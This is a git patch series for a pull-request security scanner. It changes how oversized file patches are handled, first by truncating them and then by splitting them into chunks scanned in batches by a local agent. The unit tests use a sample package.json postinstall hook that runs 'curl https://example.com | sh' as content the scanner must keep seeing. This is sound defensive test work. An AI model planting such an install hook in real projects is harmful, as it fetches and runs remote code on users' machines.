From 87c4b0dd421fb7d0e4abf5fa72be75212a2260fc Mon Sep 17 00:00:00 2001 From: Ismail Pelaseyed Date: Mon, 18 May 2026 08:16:12 +0200 Subject: [PATCH 1/2] fix issues with oversized patches --- src/services/__tests__/prScanner.test.ts | 16 ++++++---- src/services/prScanner.ts | 38 ++++++++++++++++++------ 2 files changed, 39 insertions(+), 15 deletions(-) diff --git a/src/services/__tests__/prScanner.test.ts b/src/services/__tests__/prScanner.test.ts index ee891b1..d75d12f 100644 --- a/src/services/__tests__/prScanner.test.ts +++ b/src/services/__tests__/prScanner.test.ts @@ -134,7 +134,7 @@ describe("scanPrLocally", () => { expect(result.findings?.[0]?.file).toBe("package.json"); }); - it("returns an error result when a file patch exceeds the per-file scan limit", async () => { + it("truncates a file patch that exceeds the per-file scan limit", async () => { const oversizedPatch = `${"a".repeat(8_000)}\n+"postinstall": "curl https://example.com | sh"`; const fetchMock = vi .fn() @@ -148,15 +148,19 @@ describe("scanPrLocally", () => { changes: 1, patch: oversizedPatch, }, - ])); + ])) + .mockResolvedValueOnce(jsonResponse({ findings: [] })); vi.stubGlobal("fetch", fetchMock); const result = await scanPrLocally("acme", "repo", 12); - expect(result.error).toBe( - "PR patch for package.json exceeds the 8000 character per-file scan limit", - ); - expect(fetchMock).toHaveBeenCalledTimes(2); + expect(result).toEqual({ findings: [] }); + expect(fetchMock).toHaveBeenCalledTimes(3); + + const body = JSON.parse(fetchMock.mock.calls[2][1].body); + expect(body.files[0].patch).toHaveLength(8_000); + expect(body.files[0].patch).toContain("Superagent truncated"); + expect(body.files[0].patch).toContain('"postinstall": "curl https://example.com | sh"'); }); it("returns an error result when total patch payload exceeds the scan limit", async () => { diff --git a/src/services/prScanner.ts b/src/services/prScanner.ts index 9a4fba4..3c1f292 100644 --- a/src/services/prScanner.ts +++ b/src/services/prScanner.ts @@ -5,6 +5,7 @@ const GITHUB_PR_FILES_PER_PAGE = 100; const GITHUB_PR_FILES_PAGE_LIMIT = 30; const MAX_PATCH_CHARS_PER_FILE = 8_000; const MAX_PAYLOAD_CHARS = 100_000; +const PATCH_TRUNCATION_MARKER_PREFIX = "\n\n[Superagent truncated "; interface GitHubPrFile { filename: string; @@ -152,18 +153,13 @@ async function fetchGitHub(pathAndQuery: string, githubToken?: string): Promi function buildPayloadFiles(files: GitHubPrFile[]): PrScanPayload["files"] { let remaining = MAX_PAYLOAD_CHARS; return files.map((file) => { - const rawPatch = file.patch ?? ""; - if (rawPatch.length > MAX_PATCH_CHARS_PER_FILE) { - throw new Error( - `PR patch for ${file.filename} exceeds the ${MAX_PATCH_CHARS_PER_FILE} character per-file scan limit`, - ); - } - if (rawPatch.length > remaining) { + const patch = truncatePatch(file.patch ?? ""); + if (patch.length > remaining) { throw new Error( `Total PR patch payload exceeds the ${MAX_PAYLOAD_CHARS} character scan limit before fully scanning ${file.filename}`, ); } - remaining -= rawPatch.length; + remaining -= patch.length; return { path: file.filename, @@ -172,11 +168,35 @@ function buildPayloadFiles(files: GitHubPrFile[]): PrScanPayload["files"] { additions: file.additions ?? 0, deletions: file.deletions ?? 0, changes: file.changes ?? 0, - patch: rawPatch, + patch, }; }); } +function truncatePatch(patch: string): string { + if (patch.length <= MAX_PATCH_CHARS_PER_FILE) return patch; + + let marker = buildPatchTruncationMarker(patch.length - MAX_PATCH_CHARS_PER_FILE); + + while (true) { + const contentBudget = MAX_PATCH_CHARS_PER_FILE - marker.length; + const headLength = Math.ceil(contentBudget / 2); + const tailLength = Math.floor(contentBudget / 2); + const omittedChars = patch.length - headLength - tailLength; + const exactMarker = buildPatchTruncationMarker(omittedChars); + + if (exactMarker.length === marker.length) { + return `${patch.slice(0, headLength)}${exactMarker}${patch.slice(-tailLength)}`; + } + + marker = exactMarker; + } +} + +function buildPatchTruncationMarker(omittedChars: number): string { + return `${PATCH_TRUNCATION_MARKER_PREFIX}${omittedChars} characters from the middle of this patch to stay within the per-file scan limit]\n\n`; +} + async function runFluePrScan(payload: PrScanPayload): Promise { const baseUrl = process.env.FLUE_BASE_URL ?? "http://127.0.0.1:3583"; const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}`); From 96d7365dedd89bb938958c8ba01ca4a298a41ef0 Mon Sep 17 00:00:00 2001 From: Ismail Pelaseyed Date: Mon, 18 May 2026 08:36:33 +0200 Subject: [PATCH 2/2] Scan oversized PR patches in chunks --- .flue/agents/pr-scan.ts | 10 +++ src/services/__tests__/prScanner.test.ts | 64 ++++++++++++++--- src/services/prScanner.ts | 92 ++++++++++++++++-------- 3 files changed, 128 insertions(+), 38 deletions(-) diff --git a/.flue/agents/pr-scan.ts b/.flue/agents/pr-scan.ts index ce99db9..a6f9627 100644 --- a/.flue/agents/pr-scan.ts +++ b/.flue/agents/pr-scan.ts @@ -46,12 +46,18 @@ type PrScanPayload = { headRef?: string; headRepo?: string; }; + scan?: { + batch?: number; + batches?: number; + }; files?: Array<{ path: string; previousPath?: string; status: string; additions?: number; deletions?: number; + patchPart?: number; + patchParts?: number; patch?: string; }>; }; @@ -129,6 +135,8 @@ async function scanCiCdWorkflows( workflows: workflowFiles.map((file) => ({ path: file.path, status: file.status, + patchPart: file.patchPart, + patchParts: file.patchParts, patch: file.patch ?? "", })), }, @@ -167,6 +175,7 @@ Do not flag ordinary refactors, formatting, harmless dependency updates, or expe Repository: ${pr.owner ?? ""}/${pr.repo ?? ""} PR: #${pr.prNumber ?? ""} +Scan batch: ${pr.scan?.batch ?? 1} of ${pr.scan?.batches ?? 1} Title: ${pr.pullRequest?.title ?? ""} Author: ${pr.pullRequest?.author ?? ""} Base: ${pr.pullRequest?.baseRef ?? ""} @@ -178,6 +187,7 @@ CI/CD skill findings: ${JSON.stringify(ciCdFindings, null, 2)} Changed files and patches: +Large patches may appear as multiple records with the same path and patchPart/patchParts metadata. These parts are contiguous. Scan every part; no patch content has been omitted. ${JSON.stringify(pr.files, null, 2)} `; } diff --git a/src/services/__tests__/prScanner.test.ts b/src/services/__tests__/prScanner.test.ts index d75d12f..8d8b19f 100644 --- a/src/services/__tests__/prScanner.test.ts +++ b/src/services/__tests__/prScanner.test.ts @@ -134,7 +134,7 @@ describe("scanPrLocally", () => { expect(result.findings?.[0]?.file).toBe("package.json"); }); - it("truncates a file patch that exceeds the per-file scan limit", async () => { + it("splits a file patch that exceeds the per-file scan limit without omitting content", async () => { const oversizedPatch = `${"a".repeat(8_000)}\n+"postinstall": "curl https://example.com | sh"`; const fetchMock = vi .fn() @@ -158,12 +158,22 @@ describe("scanPrLocally", () => { expect(fetchMock).toHaveBeenCalledTimes(3); const body = JSON.parse(fetchMock.mock.calls[2][1].body); - expect(body.files[0].patch).toHaveLength(8_000); - expect(body.files[0].patch).toContain("Superagent truncated"); - expect(body.files[0].patch).toContain('"postinstall": "curl https://example.com | sh"'); + expect(body.files).toHaveLength(2); + expect(body.files[0]).toMatchObject({ + path: "package.json", + patchPart: 1, + patchParts: 2, + }); + expect(body.files[1]).toMatchObject({ + path: "package.json", + patchPart: 2, + patchParts: 2, + patch: expect.stringContaining('"postinstall": "curl https://example.com | sh"'), + }); + expect(body.files.map((file: { patch: string }) => file.patch).join("")).toBe(oversizedPatch); }); - it("returns an error result when total patch payload exceeds the scan limit", async () => { + it("scans all patch content across multiple Flue batches", async () => { const files = Array.from({ length: 13 }, (_, index) => ({ filename: `file-${index}.txt`, status: "modified", @@ -175,15 +185,51 @@ describe("scanPrLocally", () => { const fetchMock = vi .fn() .mockResolvedValueOnce(jsonResponse({ title: "Update build", body: "", user: { login: "octocat" } })) - .mockResolvedValueOnce(jsonResponse(files)); + .mockResolvedValueOnce(jsonResponse(files)) + .mockResolvedValueOnce(jsonResponse({ + findings: [ + { + category: "malicious_intent", + severity: "medium", + title: "First batch finding", + file: "file-0.txt", + evidence: "Suspicious content in first batch.", + recommendation: "Review the first batch.", + }, + ], + })) + .mockResolvedValueOnce(jsonResponse({ + findings: [ + { + category: "malicious_intent", + severity: "medium", + title: "Second batch finding", + file: "file-12.txt", + evidence: "Suspicious content in second batch.", + recommendation: "Review the second batch.", + }, + ], + })); vi.stubGlobal("fetch", fetchMock); const result = await scanPrLocally("acme", "repo", 12); - expect(result.error).toBe( - "Total PR patch payload exceeds the 100000 character scan limit before fully scanning file-12.txt", + expect(fetchMock).toHaveBeenCalledWith( + "http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-1-of-2", + expect.objectContaining({ method: "POST" }), + ); + expect(fetchMock).toHaveBeenCalledWith( + "http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-2-of-2", + expect.objectContaining({ method: "POST" }), ); - expect(fetchMock).toHaveBeenCalledTimes(2); + const firstBatchBody = JSON.parse(fetchMock.mock.calls[2][1].body); + const secondBatchBody = JSON.parse(fetchMock.mock.calls[3][1].body); + expect(firstBatchBody.files).toHaveLength(12); + expect(secondBatchBody.files).toHaveLength(1); + expect(result.findings?.map((finding) => finding.title)).toEqual([ + "First batch finding", + "Second batch finding", + ]); }); it("returns an inconclusive error result when Flue fails", async () => { diff --git a/src/services/prScanner.ts b/src/services/prScanner.ts index 3c1f292..7223aa6 100644 --- a/src/services/prScanner.ts +++ b/src/services/prScanner.ts @@ -5,7 +5,6 @@ const GITHUB_PR_FILES_PER_PAGE = 100; const GITHUB_PR_FILES_PAGE_LIMIT = 30; const MAX_PATCH_CHARS_PER_FILE = 8_000; const MAX_PAYLOAD_CHARS = 100_000; -const PATCH_TRUNCATION_MARKER_PREFIX = "\n\n[Superagent truncated "; interface GitHubPrFile { filename: string; @@ -39,6 +38,10 @@ interface PrScanPayload { headSha: string; headRepo: string; }; + scan?: { + batch: number; + batches: number; + }; files: Array<{ path: string; previousPath?: string; @@ -46,6 +49,8 @@ interface PrScanPayload { additions: number; deletions: number; changes: number; + patchPart?: number; + patchParts?: number; patch: string; }>; } @@ -65,7 +70,7 @@ export async function scanPrLocally( try { const payload = await collectPrScanPayload(owner, repo, prNumber, options.githubToken); - const result = await runFluePrScan(payload); + const result = await runFluePrScans(payload); log.info({ findings: result.findings?.length ?? 0 }, "Local Flue PR scan completed"); return result; } catch (err) { @@ -151,55 +156,84 @@ async function fetchGitHub(pathAndQuery: string, githubToken?: string): Promi } function buildPayloadFiles(files: GitHubPrFile[]): PrScanPayload["files"] { - let remaining = MAX_PAYLOAD_CHARS; - return files.map((file) => { - const patch = truncatePatch(file.patch ?? ""); - if (patch.length > remaining) { - throw new Error( - `Total PR patch payload exceeds the ${MAX_PAYLOAD_CHARS} character scan limit before fully scanning ${file.filename}`, - ); - } - remaining -= patch.length; + return files.flatMap((file) => { + const patchChunks = splitPatch(file.patch ?? "", MAX_PATCH_CHARS_PER_FILE); - return { + return patchChunks.map((patch, index) => ({ path: file.filename, previousPath: file.previous_filename, status: file.status, additions: file.additions ?? 0, deletions: file.deletions ?? 0, changes: file.changes ?? 0, + patchPart: patchChunks.length > 1 ? index + 1 : undefined, + patchParts: patchChunks.length > 1 ? patchChunks.length : undefined, patch, - }; + })); }); } -function truncatePatch(patch: string): string { - if (patch.length <= MAX_PATCH_CHARS_PER_FILE) return patch; +function splitPatch(patch: string, maxChars: number): string[] { + if (patch.length <= maxChars) return [patch]; - let marker = buildPatchTruncationMarker(patch.length - MAX_PATCH_CHARS_PER_FILE); + const chunks: string[] = []; + for (let offset = 0; offset < patch.length; offset += maxChars) { + chunks.push(patch.slice(offset, offset + maxChars)); + } + return chunks; +} - while (true) { - const contentBudget = MAX_PATCH_CHARS_PER_FILE - marker.length; - const headLength = Math.ceil(contentBudget / 2); - const tailLength = Math.floor(contentBudget / 2); - const omittedChars = patch.length - headLength - tailLength; - const exactMarker = buildPatchTruncationMarker(omittedChars); +async function runFluePrScans(payload: PrScanPayload): Promise { + const findings: PrFinding[] = []; - if (exactMarker.length === marker.length) { - return `${patch.slice(0, headLength)}${exactMarker}${patch.slice(-tailLength)}`; + for (const batch of buildPayloadBatches(payload)) { + const result = await runFluePrScan(batch); + if (result.error) return { error: result.error }; + findings.push(...(result.findings ?? [])); + } + + return { findings }; +} + +function buildPayloadBatches(payload: PrScanPayload): PrScanPayload[] { + if (!payload.files.length) return [payload]; + + const fileBatches: PrScanPayload["files"][] = []; + let currentBatch: PrScanPayload["files"] = []; + let currentPatchChars = 0; + + for (const file of payload.files) { + if ( + currentBatch.length > 0 + && currentPatchChars + file.patch.length > MAX_PAYLOAD_CHARS + ) { + fileBatches.push(currentBatch); + currentBatch = []; + currentPatchChars = 0; } - marker = exactMarker; + currentBatch.push(file); + currentPatchChars += file.patch.length; } -} -function buildPatchTruncationMarker(omittedChars: number): string { - return `${PATCH_TRUNCATION_MARKER_PREFIX}${omittedChars} characters from the middle of this patch to stay within the per-file scan limit]\n\n`; + if (currentBatch.length > 0) fileBatches.push(currentBatch); + + return fileBatches.map((files, index) => ({ + ...payload, + scan: { + batch: index + 1, + batches: fileBatches.length, + }, + files, + })); } async function runFluePrScan(payload: PrScanPayload): Promise { const baseUrl = process.env.FLUE_BASE_URL ?? "http://127.0.0.1:3583"; - const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}`); + const batchSuffix = payload.scan && payload.scan.batches > 1 + ? `-batch-${payload.scan.batch}-of-${payload.scan.batches}` + : ""; + const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}${batchSuffix}`); const res = await fetch(`${baseUrl}/agents/pr-scan/${agentId}`, { method: "POST", headers: {